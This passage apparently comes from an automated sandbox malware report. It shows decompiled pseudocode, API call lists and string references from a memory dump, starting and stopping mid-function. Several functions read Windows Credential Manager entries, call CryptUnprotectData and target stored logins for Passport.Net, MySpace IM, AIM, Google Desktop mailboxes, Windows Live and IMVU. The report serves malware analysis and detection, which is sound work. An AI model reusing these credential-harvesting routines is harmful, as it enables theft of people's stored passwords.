                                          				_v516 = 0;
                                          				memset( &_v515, 0, 0xfe);
                                          				E004067EC(_a4, "<?xml version="1.0"  encoding="ISO-8859-1" ?>");
                                          				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
                                          				_t28 =  &_v260;
                                          				E00409DD6(_t28, _t17);
                                          				_push(_t28);
                                          				sprintf( &_v516, "<%s>");
                                          				return E004067EC(_a4,  &_v516);
                                          			}












                                          APIs
                                          • memset.MSVCRT ref: 0040A64A
                                          • memset.MSVCRT ref: 0040A660
                                            • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                            • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                            • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
                                            • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                          • sprintf.MSVCRT ref: 0040A697
                                          Strings
                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040A665
                                          • <%s>, xrefs: 0040A691
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                          • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                          • API String ID: 3699762281-1998499579
                                          • Opcode ID: ab5707da10e36317461923ea0a964ffd6f4046b5a0df19b15fd79c1ac8c7a337
                                          • Instruction ID: 800cbe4d2eb2546f00b8b879064eadffaf4e9ad3efc3a30f3f6e1286e630d524
                                          • Opcode Fuzzy Hash: ab5707da10e36317461923ea0a964ffd6f4046b5a0df19b15fd79c1ac8c7a337
                                          • Instruction Fuzzy Hash: 92012B7294021977DB21A715CC46FDA7B6CAF14709F0400BBB50DF3082DB789B848BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: f3ce8d52872a8f30b96e2fbf292860e550b06a588b426c696271bbab4e9a7e1e
                                          • Instruction ID: fe66dba444066183ee9975a3477c76674c14659d363ac613d024ab661048b2ad
                                          • Opcode Fuzzy Hash: f3ce8d52872a8f30b96e2fbf292860e550b06a588b426c696271bbab4e9a7e1e
                                          • Instruction Fuzzy Hash: 25F0FF726097015BD7209FAAB5C059BB7E9BB49725B60193FF54DD3682C738BC808A1C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E004093D6(intOrPtr* __edi) {
                                          				void* __esi;
                                          				intOrPtr* _t7;
                                          				intOrPtr* _t12;
                                          				intOrPtr* _t18;
                                          				intOrPtr _t21;
                                          				intOrPtr _t22;
                                          				intOrPtr _t23;
                                          				intOrPtr _t24;
                                          
                                          				_t18 = __edi;
                                          				 *__edi = 0x418528;
                                          				E00409370(__edi);
                                          				_t21 =  *((intOrPtr*)(__edi + 0x10));
                                          				if(_t21 != 0) {
                                          					E00407491(_t21);
                                          					0x413d56(_t21);
                                          				}
                                          				_t22 =  *((intOrPtr*)(_t18 + 0xc));
                                          				if(_t22 != 0) {
                                          					E00407491(_t22);
                                          					0x413d56(_t22);
                                          				}
                                          				_t23 =  *((intOrPtr*)(_t18 + 8));
                                          				if(_t23 != 0) {
                                          					E00407491(_t23);
                                          					0x413d56(_t23);
                                          				}
                                          				_t24 =  *((intOrPtr*)(_t18 + 4));
                                          				if(_t24 != 0) {
                                          					E00407491(_t24);
                                          					0x413d56(_t24);
                                          				}
                                          				_t12 = _t18;
                                          				_t7 =  *((intOrPtr*)( *_t12))();
                                          				0x413de6( *_t7);
                                          				return _t7;
                                          			}












                                          APIs
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040937C
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040938A
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040939B
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093B2
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093BB
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004093F1
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409404
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409417
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040942A
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040943E
                                            • Part of subcall function 00407491: ??3@YAXPAX@Z.MSVCRT ref: 00407498
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: ac05d42046456b830cc0969aedd76e8629731d07fd3b456628963a844cb8144e
                                          • Instruction ID: 09cfe481c9f5149ef6062cf2713671c90beccbfb684cd0f5c8863379cec44e3f
                                          • Opcode Fuzzy Hash: ac05d42046456b830cc0969aedd76e8629731d07fd3b456628963a844cb8144e
                                          • Instruction Fuzzy Hash: 67F06232D0E53167C9257F26B00158EA7646E46725315426FF8097B3D3CF3C6D8146EE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406B6F: memset.MSVCRT ref: 00406B8F
                                            • Part of subcall function 00406B6F: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406BA2
                                            • Part of subcall function 00406B6F: _strcmpi.MSVCRT ref: 00406BB4
                                          • SetBkMode.GDI32(?,00000001), ref: 00411B4E
                                          • GetSysColor.USER32(00000005), ref: 00411B56
                                          • SetBkColor.GDI32(?,00000000), ref: 00411B60
                                          • SetTextColor.GDI32(?,00C00000), ref: 00411B6E
                                          • GetSysColorBrush.USER32(00000005), ref: 00411B76
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                                          • String ID:
                                          • API String ID: 2775283111-0
                                          • Opcode ID: 4c6c90dc6369ed9def7ad49a685608b6b97007b198ef546a8f3c4911ca2b9476
                                          • Instruction ID: b9af807899647846139a12986955ac2cc84645abd360b6802fc8b760439410eb
                                          • Opcode Fuzzy Hash: 4c6c90dc6369ed9def7ad49a685608b6b97007b198ef546a8f3c4911ca2b9476
                                          • Instruction Fuzzy Hash: 92F03136104504FBDF112FA5EC09FDE3F25EF44721F10812AFA19951B1DB75A9A09B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00404109: LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,73AFF420,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
                                            • Part of subcall function 00404109: GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
                                            • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
                                            • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147
                                            • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                            • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$ByteCharLibraryLoadMultiWide$FreeLocal
                                          • String ID: Passport.Net\*
                                          • API String ID: 4171712514-3671122194
                                          • Opcode ID: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
                                          • Instruction ID: a8053254f1e515f4d897164d33fe2023de59da6d422685d1f9c73d0263123044
                                          • Opcode Fuzzy Hash: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
                                          • Instruction Fuzzy Hash: 9231F7B1D01129AADB10DF95DC44EDEBBB8FF49750F11406BF610A7250D7789A81CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                          • GetFileSize.KERNEL32(00000000,00000000,MySpace\IM\users.txt,00000104,00000000,?,?,?,?,00410C45,?,00000000), ref: 00410AE7
                                            • Part of subcall function 00407A56: ??3@YAXPAX@Z.MSVCRT ref: 00407A5D
                                            • Part of subcall function 00407A56: ??2@YAPAXI@Z.MSVCRT ref: 00407A6B
                                            • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,?,?,?,?,?,?,?,00410C45), ref: 00410B64
                                            • Part of subcall function 004108FA: memset.MSVCRT ref: 00410939
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00410C45,?,00000000), ref: 00410B78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: File$??2@??3@ByteCharCloseCreateHandleMultiReadSizeWidememset
                                          • String ID: MySpace\IM\users.txt
                                          • API String ID: 429556018-1720829597
                                          • Opcode ID: 9ecfc60a0865bdac6d3c577decf5946b40f4711ca6fbc71636231e6ee1035587
                                          • Instruction ID: 28eca0bbeff0950369e7ada1521615d79b3b69832f60dc8e7f5924118cda3e2e
                                          • Opcode Fuzzy Hash: 9ecfc60a0865bdac6d3c577decf5946b40f4711ca6fbc71636231e6ee1035587
                                          • Instruction Fuzzy Hash: 21217171C0424AEFCF00DFA9CC458DEBB74EF41328B158166E924772A1C634AA45CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • memset.MSVCRT ref: 00402873
                                            • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                          • RegCloseKey.ADVAPI32(?), ref: 004028C2
                                          • RegCloseKey.ADVAPI32(?), ref: 004028DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Close$EnumOpenmemset
                                          • String ID: Software\AIM\AIMPRO
                                          • API String ID: 2255314230-3527110354
                                          • Opcode ID: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
                                          • Instruction ID: 67585355273d4b01a1114a6cd89f6c97ebf6c1cbf8b7b4d496df69d3c229a794
                                          • Opcode Fuzzy Hash: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
                                          • Instruction Fuzzy Hash: 48115E76904118BADF21A792ED06FDE7B7CDF54304F0000B6AA44E1091EB756FD5DA64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00407BC6(intOrPtr* _a4) {
                                          				void* _v12;
                                          				void* _v16;
                                          				void _v271;
                                          				char _v272;
                                          				void** _t16;
                                          				char* _t19;
                                          				char* _t21;
                                          				int _t26;
                                          				void* _t28;
                                          				void* _t29;
                                          				void* _t30;
                                          				void* _t31;
                                          
                                          				_t16 =  &_v12;
                                          				0x411d68(0x80000001, "Software\Google\Google Desktop\Mailboxes", _t16);
                                          				_t29 = _t28 + 0xc;
                                          				if(_t16 == 0) {
                                          					_t26 = 0;
                                          					_v272 = 0;
                                          					memset( &_v271, 0, 0xff);
                                          					_t30 = _t29 + 0xc;
                                          					_t19 =  &_v272;
                                          					0x411dee(_v12, 0, _t19);
                                          					while(1) {
                                          						_t31 = _t30 + 0xc;
                                          						if(_t19 != 0) {
                                          							break;
                                          						}
                                          						_t21 =  &_v272;
                                          						0x411d68(_v12, _t21,  &_v16);
                                          						_t30 = _t31 + 0xc;
                                          						if(_t21 == 0) {
                                          							E00407A93(_a4, _v16,  &_v272);
                                          							RegCloseKey(_v16);
                                          						}
                                          						_t19 =  &_v272;
                                          						_t26 = _t26 + 1;
                                          						0x411dee(_v12, _t26, _t19);
                                          					}
                                          					return RegCloseKey(_v12);
                                          				}
                                          				return _t16;
                                          			}
















                                          APIs
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • memset.MSVCRT ref: 00407C05
                                            • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                          • RegCloseKey.ADVAPI32(?), ref: 00407C54
                                          • RegCloseKey.ADVAPI32(?), ref: 00407C71
                                          Strings
                                          • Software\Google\Google Desktop\Mailboxes, xrefs: 00407BD5
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Close$EnumOpenmemset
                                          • String ID: Software\Google\Google Desktop\Mailboxes
                                          • API String ID: 2255314230-2212045309
                                          • Opcode ID: b50ec71faf233748746677e360152f00ca846f408f6190e6d0fa9129bc25d888
                                          • Instruction ID: a9c93927ac610b6ef28ec82afd47bdb8c9c4627465144405bf34b6a811739c17
                                          • Opcode Fuzzy Hash: b50ec71faf233748746677e360152f00ca846f408f6190e6d0fa9129bc25d888
                                          • Instruction Fuzzy Hash: E9115EB6D04118BADF21AB91EC41FDEBB7CDF55304F0041B6BA04E1051E7756B94CEA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00403BF0(intOrPtr __ecx, void* __edx, void* __eflags, long long __fp0, void* _a4) {
                                          				intOrPtr _v8;
                                          				char _v272;
                                          				void _v528;
                                          				void _v536;
                                          				char _v540;
                                          				intOrPtr _v544;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t24;
                                          				char* _t27;
                                          				intOrPtr _t32;
                                          				void* _t37;
                                          				void* _t40;
                                          				char* _t44;
                                          				void* _t46;
                                          
                                          				_v544 = __ecx;
                                          				_v540 = 0x417ea8;
                                          				E0040D77D( &_v528);
                                          				memset( &_v536, 0, 0x214);
                                          				_t24 = memcpy( &_v528, _a4, 0x82 << 2);
                                          				0x413d62( &_v272,  &_v528, _t40, _t46);
                                          				_pop(_t37);
                                          				if(_t24 != 0) {
                                          					_t44 =  &_v272;
                                          					_v8 = E004037A2(_t44, __fp0);
                                          					_t27 = _t44;
                                          					0x413d74( &_v528);
                                          					_t37 = _t27;
                                          					if(_t27 == 0) {
                                          						_t32 = 0xa;
                                          						if(_v8 > _t32) {
                                          							_v8 = _t32;
                                          						}
                                          					}
                                          				} else {
                                          					_v8 = 1;
                                          				}
                                          				E00409D21(_t37, _v544,  &_v540);
                                          				return 1;
                                          			}



















                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscmp_mbsicmpmemset
                                          • String ID: :@
                                          • API String ID: 1080945674-3074689909
                                          • Opcode ID: fc6b87c77e97942f29d542673130d1b31dda64e9daeb6a0660619c666916343b
                                          • Instruction ID: 05d51c46cf4b3144aa59074ae4edee5e5c3f47845a6acae635e5c8c721b5e64e
                                          • Opcode Fuzzy Hash: fc6b87c77e97942f29d542673130d1b31dda64e9daeb6a0660619c666916343b
                                          • Instruction Fuzzy Hash: 9911867250C3459AD720EEA5E809BDB77DCEB84315F004D3FF594E3181E7749609879A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _wcsnicmp.MSVCRT ref: 0041053E
                                            • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
                                            • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00410570
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00410587
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWidememset$_wcsnicmp
                                          • String ID: windowslive:name=
                                          • API String ID: 947294041-3311407311
                                          • Opcode ID: fd4d89018f6d8f297b5807dfdb0caed421d73eceed85ab27545bd491571ae371
                                          • Instruction ID: aaacd06d763df2f40df435721f5dd751edfa9d120b015f6101ff871e9026a9e8
                                          • Opcode Fuzzy Hash: fd4d89018f6d8f297b5807dfdb0caed421d73eceed85ab27545bd491571ae371
                                          • Instruction Fuzzy Hash: A80184B6604209BFD710DF59DC84DD77BECEB49364F10462ABA28D72A1D630DD04CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040F325
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040F339
                                          • _wcsnicmp.MSVCRT ref: 0040F347
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWide$_wcsnicmp
                                          • String ID: http://www.imvu.com
                                          • API String ID: 1082246498-3717390816
                                          • Opcode ID: d858862f83375720269192bc115d82f05b3495ae824a477da88cd8a016989edf
                                          • Instruction ID: a621eff572e40bce3e368aabcc4a0ad2a08d37bae4b59898fbad6a548f86f146
                                          • Opcode Fuzzy Hash: d858862f83375720269192bc115d82f05b3495ae824a477da88cd8a016989edf
                                          • Instruction Fuzzy Hash: CD1152B2544349AED7309E599C84EEB7FACEB89364F10062EB96892191D7305A14C6B2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memcpy.MSVCRT ref: 004108AE
                                          • memcpy.MSVCRT ref: 004108C0
                                          • DialogBoxParamA.USER32(0000006B,?,Function_000105A6,00000000), ref: 004108E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy$DialogParam
                                          • String ID: ;4
                                          • API String ID: 392721444-4181167889
                                          • Opcode ID: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
                                          • Instruction ID: 2aaa1d25541d53f243854b8b99eb4e9492d8e88977a0f1258d463d5600498ee3
                                          • Opcode Fuzzy Hash: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
                                          • Instruction Fuzzy Hash: 86F0A771A44730BBF7216F55BC06BC67A91AB08B06F218036F545A51D0C3B925D08FDC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 40%
                                          			E00406B6F(struct HWND__* _a4) {
                                          				void _v259;
                                          				char _v260;
                                          				signed int _t10;
                                          
                                          				_v260 = 0;
                                          				memset( &_v259, 0, 0xff);
                                          				GetClassNameA(_a4,  &_v260, 0xff);
                                          				_t10 =  &_v260;
                                          				0x413dce(_t10, "edit");
                                          				asm("sbb eax, eax");
                                          				return  ~_t10 + 1;
                                          			}







                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ClassName_strcmpimemset
                                          • String ID: edit
                                          • API String ID: 275601554-2167791130
                                          • Opcode ID: 1fc934d62d77a70a9e396aa4a7c9eacbfe567db38c0b85652fff254433e2e45d
                                          • Instruction ID: aca7036e1f85a757735cd09c7bf6aa39e2ce89dfda263754777898d954571a1f
                                          • Opcode Fuzzy Hash: 1fc934d62d77a70a9e396aa4a7c9eacbfe567db38c0b85652fff254433e2e45d
                                          • Instruction Fuzzy Hash: 61E09BB3C5012A6ADB11AA64EC05FE5376C9F54705F0001F6B949E2081E5B457C44B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00401085(void* __edi) {
                                          				struct tagLOGFONTA _v64;
                                          				int* _t12;
                                          
                                          				E00406A19( &_v64, "MS Sans Serif", 0xa, 1);
                                          				_t12 = __edi + 0x20c;
                                          				 *_t12 = CreateFontIndirectA( &_v64);
                                          				return SendMessageA(GetDlgItem( *(__edi + 4), 0x3ec), 0x30,  *_t12, 0);
                                          			}






                                          APIs
                                            • Part of subcall function 00406A19: memset.MSVCRT ref: 00406A23
                                            • Part of subcall function 00406A19: _mbscpy.MSVCRT ref: 00406A63
                                          • CreateFontIndirectA.GDI32(?), ref: 004010AA
                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BA
                                          • SendMessageA.USER32(00000000,00000030,?,00000000), ref: 004010C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CreateFontIndirectItemMessageSend_mbscpymemset
                                          • String ID: MS Sans Serif
                                          • API String ID: 2650341901-168460110
                                          • Opcode ID: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
                                          • Instruction ID: 5c9505941c48c8dd7a2399cb1aaf590a0077e647136f214fd0fe6491ebdd60b9
                                          • Opcode Fuzzy Hash: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
                                          • Instruction Fuzzy Hash: 67E06D71A40604FBCB116BA0EC0AFCABB6CAB44700F108125FA51B60E1D7B0A114CB88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: SHGetSpecialFolderPathA$shell32.dll
                                          • API String ID: 2574300362-543337301
                                          • Opcode ID: 65bafe7a062dc340e9a6b521779d20cd872f84261b23a2d66ef8095fb01f6124
                                          • Instruction ID: a03a44e40ad870f41b9c2d8f2e6b277420dcc77a40eb9148cfb32e265f33a348
                                          • Opcode Fuzzy Hash: 65bafe7a062dc340e9a6b521779d20cd872f84261b23a2d66ef8095fb01f6124
                                          • Instruction Fuzzy Hash: 2ED0C978A00302EBEB20DF61BD597D63FA8A74C711F20C036F905D2262DBB865D0CA2C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$memset
                                          • String ID:
                                          • API String ID: 1860491036-0
                                          • Opcode ID: cefea47da0d948a8b2b7f14bfbe4bf7bfbc63bea052a784fe90b9effbb1e0511
                                          • Instruction ID: 077d2ad6405c458e4821e20ddf5ab0b81a66c3d9f88b424bd3f36c9f492752c9
                                          • Opcode Fuzzy Hash: cefea47da0d948a8b2b7f14bfbe4bf7bfbc63bea052a784fe90b9effbb1e0511
                                          • Instruction Fuzzy Hash: F0310AB4A007008FDB609F2AD945692FBF4FF84305F25886FD549CB262D7B8D491CB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpistrchr$_mbscpymemsetstrrchr
                                          • String ID:
                                          • API String ID: 274398480-0
                                          • Opcode ID: 8152aa6171c4159ef6465b31656666253e18c95892931f65106702393bd21b79
                                          • Instruction ID: 328b4c9133cd54f2635944cbca80cb08cea31e8af7c0159c33255436c65d5f23
                                          • Opcode Fuzzy Hash: 8152aa6171c4159ef6465b31656666253e18c95892931f65106702393bd21b79
                                          • Instruction Fuzzy Hash: C601D6756082087AEB20BB72DC03FCB3B9C8F1175AF10005FF689A50D1EEA8D6C146AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040C9C7(void* __edi, void* __esi, void* _a4) {
                                          				signed int _t13;
                                          				signed int _t25;
                                          				int _t26;
                                          				char* _t30;
                                          				void* _t31;
                                          				void* _t33;
                                          				void* _t35;
                                          
                                          				_t35 = __esi;
                                          				_t25 = 0x3f;
                                          				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
                                          				_t30 = __esi + 0x18 + _t13;
                                          				 *_t30 = 0x80;
                                          				_t26 = _t25 - _t13;
                                          				_t31 = _t30 + 1;
                                          				if(_t26 >= 8) {
                                          					memset(_t31, 0, _t26 + 0xfffffff8);
                                          				} else {
                                          					memset(_t31, 0, _t26);
                                          					_t33 = __esi + 0x18;
                                          					E0040CA46(_t33, __esi);
                                          					memset(_t33, 0, 0x38);
                                          				}
                                          				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
                                          				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
                                          				E0040CA46(_t35 + 0x18, _t35);
                                          				memcpy(_a4, _t35, 0x10);
                                          				return memset(_t35, 0, 4);
                                          			}











                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID:
                                          • API String ID: 368790112-0
                                          • Opcode ID: db955d66aa391fc484fd506110ad959e30d2163aa55218731a18cbda7d247bce
                                          • Instruction ID: 72ff1d110960cc82dd2bfc388b685e2dd0a1937d99bf851f24f672c8116534dd
                                          • Opcode Fuzzy Hash: db955d66aa391fc484fd506110ad959e30d2163aa55218731a18cbda7d247bce
                                          • Instruction Fuzzy Hash: 4C0128B1740B00B6D231EF29DC43F6A7BA49F91B18F100B1EF1526A6C1E7B8B244865D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E0040AE7D(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				void* __ebx;
                                          				signed int _t63;
                                          				intOrPtr _t67;
                                          				intOrPtr _t72;
                                          				intOrPtr _t74;
                                          				signed int _t79;
                                          				void* _t84;
                                          				signed int _t86;
                                          				char* _t98;
                                          				void* _t100;
                                          				void* _t102;
                                          				void* _t104;
                                          				void* _t106;
                                          				void* _t107;
                                          
                                          				_t84 = __eax;
                                          				E0040972B(__eax, __eflags);
                                          				_t86 = 0;
                                          				_v12 = 0;
                                          				while(1) {
                                          					_t98 = _a4;
                                          					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
                                          						break;
                                          					}
                                          					_t86 = _t86 + 1;
                                          					if(_t86 < 1) {
                                          						continue;
                                          					}
                                          					if(strlen(_t98) >= 3) {
                                          						break;
                                          					}
                                          					_t79 = atoi(_a4);
                                          					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
                                          						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                          					}
                                          					L21:
                                          					if(_a8 != 0) {
                                          						_v12 = _v12 | 0x00001000;
                                          					}
                                          					_t63 = _v12;
                                          					 *0x41e394 =  *0x41e394 + 1;
                                          					 *((intOrPtr*)(0x41e398 +  *0x41e394 * 4)) = _t63;
                                          					return _t63;
                                          				}
                                          				_t104 = 0;
                                          				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                          				_v16 = 0;
                                          				_v8 = 0;
                                          				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                          					L14:
                                          					_t100 = 0;
                                          					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                          					_v8 = 0;
                                          					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                          						L20:
                                          						goto L21;
                                          					}
                                          					_t106 = 0;
                                          					__eflags = 0;
                                          					do {
                                          						_v20 = E00407139(0, _a4);
                                          						_t67 = E00407139(0, _a4);
                                          						__eflags = _v20;
                                          						if(_v20 >= 0) {
                                          							L18:
